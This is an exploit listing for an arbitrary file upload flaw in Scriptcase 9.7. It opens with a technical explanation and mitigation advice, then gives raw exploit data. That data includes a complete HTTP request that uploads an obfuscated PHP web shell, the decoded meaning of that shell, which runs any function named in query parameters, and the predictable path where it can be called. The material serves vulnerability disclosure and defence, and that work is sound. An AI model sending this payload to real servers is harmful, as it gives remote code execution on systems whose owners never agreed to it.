Vendor: Scriptcase
By: luckyt0mat0
CVSS: 7.5 (HIGH)
Type: Arbitrary File Upload
CWE: 434
Product Name: Scriptcase
Affected Version From: 9.7
Affected Version To: 9.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows Server 2019
2022

Scriptcase 9.7 arbitrary file upload getshell

Scriptcase 9.7 ships the jQuery-File-Upload plugin together with its server-side PHP handler at /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/. The handler accepts a multipart upload without restricting the file extension or checking the claimed Content-Type, so a file named 123.php with a PHP body is written under its original name to the web-reachable directory /scriptcase/tmp/sc_tmp_upload_{PHPSESSID}/. Because the directory name is derived from the attacker's own PHPSESSID, the location is predictable, and requesting it executes the uploaded code. The obfuscated PHP body in the proof of concept decodes to assert($_GET[0]($_GET[1])): query parameter 0 names a callable and parameter 1 is its argument (for example ?0=system&1=whoami), which gives remote code execution as the web server user. Two caveats for anyone reproducing it: the captured request carries a PHPSESSID cookie and a jqul_csrf_token form field, and the listing does not say how they were obtained, so treat a valid session and token as prerequisites; and the payload relies on PHP 7 behaviour (an undefined bare-word constant such as rad2deg evaluating to the string "rad2deg", and the $str{0} offset syntax), both of which were removed in PHP 8.0.

Mitigation:

The listing records no patch, so check with the vendor for a release that fixes the upload handler and, until one is applied, contain the exposure along the paths the proof of concept uses. Restrict /scriptcase/devel/ (the development environment) to trusted developer networks or remove it from production hosts altogether; remove or deny web access to the bundled jQuery-File-Upload server/php handler; and configure the web server so that nothing under /scriptcase/tmp/ is executed as PHP, which turns a successful upload into an inert file. Any upload handler that must stay reachable should enforce an extension allowlist, ignore the client-supplied Content-Type (the PoC declares text/html for a .php file), store files under generated names outside the document root, and require an authenticated session and a validated CSRF token.

Exploit-DB raw data:

# Exploit Title: Scriptcase 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage:  https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019

# Proof of Concept:

POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close

------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"

gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html

<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ--

# Notes:
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php